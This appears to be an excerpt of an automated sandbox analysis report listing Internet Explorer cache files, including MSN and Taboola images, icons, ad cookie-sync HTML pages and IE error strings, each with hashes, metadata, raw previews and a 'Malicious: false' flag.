Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....T....Z....&..V(.`...QG.....M.z..g.....(~k...t...Tm9.}h.J.\|.=.I..d/.....y.}.*a.. .=.K..>.... <.sJNp=......Z..1.Uoz.X......>......t.j..?...u9E>....4.s........./%....3...R..S@.G..iXf/..J....X.....@}./,.......CB.......4g.@.l..}.67+........'.J.iY..)..X< ...Z.-Z.`..........qMe..CS.vu.n..S...#..#.j...y......G p..+...1o..Z..)c.2..8..>c..N.\.Wwh.y...V....Z4.N..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BB1bgTWA[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	downloaded
Size (bytes):	6787
Entropy (8bit):	7.83851363433636
Encrypted:	false
SSDEEP:	192:xCA85Gpfz8RvEEcYsXcJJtWt5xUozinT1QiFu:UA85CUv4YsXcDAzinTTFu
MD5:	034C177E77AF60BA147A3E86018141AA
SHA1:	426E410D118ECE0C6B956E2A0E2226C4BA90D14C
SHA-256:	C935E8BA84FB81A07B2E2D29C1D3A4404185A38B1344ECCE56FBC3F87A699153
SHA-512:	1F2FAD4B3A3B01CA81D7529BC78CE8548FEC5A3AED0E6120F38C54B0FC78D17C37110EE4813513009D81496FA37A46C69421E648684A39BD04AB8C87CE79BCD4
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bgTWA.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=361&y=299
Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.r.#R...0G.j^.._.Fv!...5.:.YH.O......H.....\.1[4...+.S....Zx'...Q.........J......^..8...8...x....qX..).#"..q.3..@.,Gs..p.8...X.f..H!z....._&.x...{.Iw0....yc.`.Lb..].i..\.IN....t.E..6.P.\...d..z.&..`..q...Z..".B2.?s.....r.HJ.. \|..es.o\..(..k]j...uO.....Y.j?9...7A.pOO...P..l..y\/_.y..Y7n....v..;z~..J)...;_..1..Fs.~\.g.?3*.b9..... ..RV6........}...^.+

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BB7hjL[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	444
Entropy (8bit):	7.25373742182796
Encrypted:	false
SSDEEP:	6:6v/lhPkR/CnFFDDRHbMgYjEr710UbCO8j+qom62fke5YCsd8sKCW5biVp:6v/78/kFFlcjEN0sCoqoX4ke5V6D+bi7
MD5:	D02BB2168E72B702ECDD93BF868B4190
SHA1:	9FB22D0AB1AAA390E0AFF5B721013E706D731BF3
SHA-256:	D2750B6BEE5D9BA31AFC66126EECB39099EF6C7E619DB72775B3E0E2C8C64A6F
SHA-512:	6A801305D1D1E8448EEB62BC7062E6ED7297000070CA626FC32F5E0A3B8C093472BE72654C3552DA2648D8A491568376F3F2AC4EA0135529C96482ECF2B2FD35
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....QIDAT8O....DA.....F...md5"...R%6.].@.............D.....Q...}s.0...~.7svv.......;.%..\.....]...LK$...!.u....3.M.+.U..a..~O......O.XR=.s.../....I....l.=9$...........~A.,. ..<...Yq.9.8...I.&.....V. ..M.\..V6.....O.........!y:p.9..l......"9.....9.7.N.o^[..d......]g.%..L.1...B.1k....k....v#._.w/...w...h..\....W...../..S.`.f.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BBK9Hzy[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	541
Entropy (8bit):	7.367354185122177
Encrypted:	false
SSDEEP:	12:6v/78/W/6T4onImZBfSKTIxS9oXhTDxfIR3N400tf3QHPK5jifFpEPy:U/6rIcBfYxGoxfxfrLqHPKhif7T
MD5:	4F50C6271B3DF24A75AD8E9822453DA3
SHA1:	F8987C61D1C2D2EC12D23439802D47D43FED3BDF
SHA-256:	9AE6A4C5EF55043F07D888AB192D82BB95D38FA54BB3D41F701863239E16E21C
SHA-512:	AFA483EAFEAF31530487039FB1727B819D4E61E54C395BA9553C721FB83C3B16EDF88E60853387A4920AB8F7DFAD704D1B6D4C12CDC302BE05427FC90E7FACC8
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBK9Hzy.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.Q.K[A...M^L../+....`4..x.GAiQb..E<..A.x..'!.P(-..x....`.,...D.)............ov..Yx.`_.4...@._ .r...w.$.H....W...........mj."...IR~f...J..D.\|q.......~.<....<.I(t.q.....t...0.....h,.1.......\.1.........m......+.zB..C.....^.u:.....j.o..j....\../eH.,......}...d-<!t.\.>..X.y.W....evg.Jho..=w.Y...n.@.....e.X.z.G.........(4.H...P.L.:".%tls....jq..5....<.)~....x...]u(..o./H.....Hvf....E.D.).......j/j.=]......Z.<Z....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BBO5Geh[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	463
Entropy (8bit):	7.261982315142806
Encrypted:	false
SSDEEP:	12:6v/78/W/6T+syMxsngO/gISwEIxclfcwbKMG4Ssc:U/6engigHDm7kNGhsc
MD5:	527B3C815E8761F51A39A3EA44063E12
SHA1:	531701A0181E9687103C6290FBE9CCE4AA4388E3
SHA-256:	B2596783193588A39F9C74A23EE6CA2A1B81F54B735354483216B2EDF1E72584
SHA-512:	0A3E25D472A00FF882F780E7DF1083E4348BCE4B6058DA1B72A0B2903DBC2C53CED08D8247CDA53CE508807FD034ABD8BC5BBF2331D7CE899D4F0F11FD199E0E
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs................dIDAT8O.J.A.......,.....v"".....;X.6..J.A,D.h:El...F,lT..DSe.#..$i..3..o.6..3gf..+..\....7..X..1...=.....3.......Y.k-n....<..8...}...8.Rt...D..C).)..$...P....j.^.Qy...FL3...@...yAD...C.\;o6.?.D\|..n.~..h....G2i....J.Zd.c.SA.......l.^P.{....$\..BO.b.km.A.... ...]\|.o_x^. .b.Ci.I.e2.....[..]7.%P61.Q.d...p...@.00..\|`...,..v..=.O.0.u.....@.F.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BBPfCZL[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 50 x 50
Category:	downloaded
Size (bytes):	2313
Entropy (8bit):	7.594679301225926
Encrypted:	false
SSDEEP:	48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
MD5:	59DAB7927838DE6A39856EED1495701B
SHA1:	A80734C857BFF8FF159C1879A041C6EA2329A1FA
SHA-256:	544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
SHA-512:	7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	GIF89a2.2.....7..;..?..C..I..H..<..9.....8..F..7..E..@..C..@..6..9..8..J..z.G..>..?..A..6..>..8..:..A..=..B..4..B..D..=..K..=..@..<..:..3~.B..D.....,\|.4..2..6..:..J..;..G....Fl..1}.4..R.....Y..E..>..9..5..X..A..2..P..J../\|.9.....T.+Z.....+..<.Fq.Gn..V..;..7.Lr..W..C..<.Fp.]......A.....0{.L..E..H..@.....3..3..O..M..K....#[.3i..D..>........I....<n..;..Z..1..G..8..E....Hu..1..>..T..a.Fs..C..8..0}....;..6..t.Ft..5.Bi..:.x...E.....'z^~.......[....8`..........;..@..B.....7.....<.................F.....6...........>..?.n......g.......s...)a.Cm....'a.0Z..7....3f..<.:e.....@.q.....Ds..B....!P.n...J............Li..=......F.....B.....:r....w..\|..........`..[}.g...J.Ms..K.Ft.....'..>..........Ry.Nv.n..]..Bl........S..;....Dj.....=.....O.y.......6..J.......)V..g..5.......!..NETSCAPE2.0.....!...d...,....2.2........3.`..9.(\|.d.C .wH.(."D...(D.....d.Y......<.(PP.F...dL.@.&.28..$1S....TP......>...L..!T.X!.(..@a..IsgM..\|..Jc(Q.+.......2.:.)y2.J......W,..eW2.!....!....C.....d...zeh....P.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BBRUB0d[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	489
Entropy (8bit):	7.174224311105167
Encrypted:	false
SSDEEP:	12:6v/78/aKTthjwzd6pQNfgQkdXhSL/KdWE3VUndkJnBl:bTt25hkuSMoGd6
MD5:	315026432C2A8A31BF9B523357AE51E0
SHA1:	BD4062E4467347ED175DB124AF56FC042801F782
SHA-256:	3CC29B2E08310486079BD9DD03FC3043F2973311CE117228D73B3E7242812F4F
SHA-512:	3C8BCF1C8A1DB94F006278AC678A587BCDE39FE2CFD3D30A9CDA2296975425EA114FCB67C47B738B7746C7046B955DCC92E5F7611C6416F27DA3E8EAED87565E
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d...~IDAT8Oc..........8].,.. Z....d..)..q.!...w10qs0\|.r......,..T//`...gx^2..l....'..6.30.G....v.9.....?..g.....y.q....1\|\....}._.........g......g.T..>n8....O(..P..L.b..e...+......w.@5 ..L..{...._0..@1.C_.L.;u.L3.03.....{?......G..a.....q......B.........._........i..2......e..\|....P.....?/.i..2...p.......P.x;e...go.....\|FvV..gc0........+. 5)...?o>fx^:.,...].4...........".......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BBUZVvV[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	408
Entropy (8bit):	7.013801387688906
Encrypted:	false
SSDEEP:	6:6v/lhPkR/C+XLngtToKewFWST/5VM+1SMQN3hjZOw/dG9Ndu1RTyp:6v/78/DDgiKHWuxQNRjZO7G4
MD5:	BA89787B3DB1D63B59C40540E0A57F88
SHA1:	B1298A6DC9779B617E21A93B3D962C5E0AEA73BA
SHA-256:	2C7B2655591F2C4C17F2B3C642893493B780D9406DC79EE7F421296C3D1A32B5
SHA-512:	948A211B47C5B2194E11CD418657D09B412246CCDB451B9AE764366246DB8B40A14FA5A6B3E5ADD252107E19D06483F76C45F359B656A6768DE56160C6CA3515
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBUZVvV.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d...-IDAT8Oc\|.(..........7.......(a..(.\|....:..'....-..8.-.ld.qb/.f..P.........10p..3.u.Cy....Br...6....L....<y.L..m..R....U0......l.....~.P......5...`7.x..h..'...P.r........^F...........,..@..?.W......w.`x....*..A.......T.Z .`m.P.v..wo3..BE...ed.,.... [.....nf..T...v....(......=(..ed.".... 0.3....X:...I.;....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BBX2afX[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	688
Entropy (8bit):	7.578207563914851
Encrypted:	false
SSDEEP:	12:6v/74//aaICzkSOms9aEx1Jt+9YKLg+b3OI21P7qO1uCqbyldNEiA67:BPObXRc6AjOI21Pf1dNCg
MD5:	09A4FCF1442AD182D5E707FEBC1A665F
SHA1:	34491D02888B36F88365639EE0458EDB0A4EC3AC
SHA-256:	BE265513903C278F9C6E1EB9E4158FA7837A2ABAC6A75ECBE9D16F918C12B536
SHA-512:	2A8FA8652CB92BBA624478662BC7462D4EA8500FA36FE5E77CBD50AC6BD0F635AA68988C0E646FEDC39428C19715DCD254E241EB18A184679C3A152030FD9FF8
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................U....sRGB.........gAMA......a.....pHYs..........o.d...EIDATHK.Mh.A......4.....b.Zoz....z.".....A../.X.../........"(.A.(.qPAK/......I.Yw3...M...z./...7..}o...~u'...K_...YM...5w1b....y.V.\|.-e.i..D...[V.J...C......R.QH.....:....U.....].$]LE3.}........r..#.]...MS.....S..#..t1...Y...g........ 8."m......Q..>,.?S..{.(7.....;..I.w...?MZ..>.......7z.=.@.q@.;.U..~....:.[.Z+3UL#.........G+3.=.V."D7...r/K.._..LxY.....E..$..{. sj.D...&.......{.rYU..~G....F3..E...{. ......S....A.Z.f<=.....'.1ve.2}[.....C....h&....r.O..c....u... .N_.S.Y.Q~.?..0.M.L..P.#...b..&..5.Z....r.Q.zM'<...+.X3..Tgf._...+SS...u........./.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\checksync[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20537
Entropy (8bit):	5.298547753062415
Encrypted:	false
SSDEEP:	384:kUAG36OllD7XFe0uvg2f5vzBgF3OZOHQWwY4RXrqt:R93D5GY2RmF3OsHQWwY4RXrqt
MD5:	9035460F3A44E92B0670F4105921E66A
SHA1:	157D1CC115C076C1E0DA980926C09473E609FF63
SHA-256:	79CEF44713FB67E6D4B10CB6BA674A5C63709ECDED021CA62AF58EB30C2BF8C6
SHA-512:	856CA4744502E26BDA8ED803ACEF8CAFCF60370B2AABF7D34F72DF46D98BFD3AD35BD6D5396D1E676DAB6226B4CBCE1DA1F0953EF768548A5E4123F6ED4CF89A
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":72,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\checksync[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20537
Entropy (8bit):	5.298547753062415
Encrypted:	false
SSDEEP:	384:kUAG36OllD7XFe0uvg2f5vzBgF3OZOHQWwY4RXrqt:R93D5GY2RmF3OsHQWwY4RXrqt
MD5:	9035460F3A44E92B0670F4105921E66A
SHA1:	157D1CC115C076C1E0DA980926C09473E609FF63
SHA-256:	79CEF44713FB67E6D4B10CB6BA674A5C63709ECDED021CA62AF58EB30C2BF8C6
SHA-512:	856CA4744502E26BDA8ED803ACEF8CAFCF60370B2AABF7D34F72DF46D98BFD3AD35BD6D5396D1E676DAB6226B4CBCE1DA1F0953EF768548A5E4123F6ED4CF89A
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":72,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\checksync[3].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20537
Entropy (8bit):	5.298547753062415
Encrypted:	false
SSDEEP:	384:kUAG36OllD7XFe0uvg2f5vzBgF3OZOHQWwY4RXrqt:R93D5GY2RmF3OsHQWwY4RXrqt
MD5:	9035460F3A44E92B0670F4105921E66A
SHA1:	157D1CC115C076C1E0DA980926C09473E609FF63
SHA-256:	79CEF44713FB67E6D4B10CB6BA674A5C63709ECDED021CA62AF58EB30C2BF8C6
SHA-512:	856CA4744502E26BDA8ED803ACEF8CAFCF60370B2AABF7D34F72DF46D98BFD3AD35BD6D5396D1E676DAB6226B4CBCE1DA1F0953EF768548A5E4123F6ED4CF89A
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":72,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\checksync[4].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20537
Entropy (8bit):	5.298547753062415
Encrypted:	false
SSDEEP:	384:kUAG36OllD7XFe0uvg2f5vzBgF3OZOHQWwY4RXrqt:R93D5GY2RmF3OsHQWwY4RXrqt
MD5:	9035460F3A44E92B0670F4105921E66A
SHA1:	157D1CC115C076C1E0DA980926C09473E609FF63
SHA-256:	79CEF44713FB67E6D4B10CB6BA674A5C63709ECDED021CA62AF58EB30C2BF8C6
SHA-512:	856CA4744502E26BDA8ED803ACEF8CAFCF60370B2AABF7D34F72DF46D98BFD3AD35BD6D5396D1E676DAB6226B4CBCE1DA1F0953EF768548A5E4123F6ED4CF89A
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":72,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\errorPageStrings[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	4720
Entropy (8bit):	5.164796203267696
Encrypted:	false
SSDEEP:	96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5:	D65EC06F21C379C87040B83CC1ABAC6B
SHA1:	208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:	8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:	false
IE Cache URL:	res://ieframe.dll/errorPageStrings.js
Preview:	.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\http___cdn.taboola.com_libtrc_static_thumbnails_381d5d450bf8d84d42edbaf89d57b8ab[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	18035
Entropy (8bit):	7.970806355865025
Encrypted:	false
SSDEEP:	384:/O/Djs497XkAbjezKT1KVRWTCQzCp7amvl3VxnlQsx:/sT+KjN1avyCpWCxx
MD5:	5E1476006CF955817B999D1809498233
SHA1:	C61223B31E224C3C0686CEB4DDE5CD44BEF86688
SHA-256:	B81776E2EBBB378AA53A40B6425D6A76A88E999C38A2E5BD84BC1B0DE33B475B
SHA-512:	EAE499D38086A5A087EC95F2FF645B436508D432079ECF6FA0BBDFB988CDE5E50FE6302A6D229C5A72D64FE4FC9E10018102EFEE82D9F1154303AF6F7769E210
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F381d5d450bf8d84d42edbaf89d57b8ab.jpg
Preview:	......JFIF..........................................."......".$...$.6&&6>424>LDDL_Z_\|\|.......................- " " -D22D<I;7;I<lUKKUl}ici}................7...............3.................................................................q.\|.$.G...S...:.".\.4..D~.-V....kV..~.......-S.mX.....y.5b...z..H4..1R..4.......Z..B..W.=(.~..v..8a.K.->4...N.v;U.....X.=,u..+R...&o5n....L.f...'.%..+[..::TN...D..~`....8..TD..g%..v.....)R#>....;R....R.)S...$(c.4k!+.J..3F2....\|.J.L. T.S].WB.....c.6.Q.e.B..M..R....i..C....\:.S$.....6Q....^..q......H.9pKL.....X..~q.'c.i'..B.S{e3_#......Ik..cK8...1.....I.3.\|.4...lZ..R....M.....$...\...4.=.gL.nw.trk:..c..3#.b...]...Nl.o..}.).G.5L.@.UB.....E...M;r...cD...Y.....\|.zd.....v......\...#.....o9..0.9.H9.J........;'a.g..y\..bj\.Y...~"..E.Zf5.s;>.b.nZ.SM.%....Cf...=.N.ojs..MA4.4..C...E..9.J79.J.....)P...).\..\.y.k..s.U...eA.~.SB.du.4"...@..}.....T.0a1...'.(.v-.L....B.J.M..^u...-...V].....R....i...\|.<.....s.Q...8....}IyX.}.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\http___cdn.taboola.com_libtrc_static_thumbnails_6eecbc09e0ba9aebacce648a76896385[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	13208
Entropy (8bit):	7.957545009268005
Encrypted:	false
SSDEEP:	192:G/3vi2MGr5CBcijEArhT8Y3q97CWElsxSXJUbK3xruhr/iQLEtttoI2P:GPxMaijzrhTRq97CWYz6u3xruhUPtje
MD5:	C9522DDA3F5AC13E56E1764508215E20
SHA1:	9890170E2DE9B46B2B381623F219EE145C367872
SHA-256:	257634989C276E4263576E3EDB7B2CADF429D47DBE5D4FE30DCC0086BE1F039A
SHA-512:	70C7210C609E45FB5188E0193A04628C28A1AD7033C6FAEA2EE8E12443D4142D5F8FB2FFE7BAB73BBE3CDB6B2B903479A94AFCA2A4A816C10CE27FF21089351A
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%2Cg_xy_center%2Cx_588%2Cy_340/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F6eecbc09e0ba9aebacce648a76896385.png
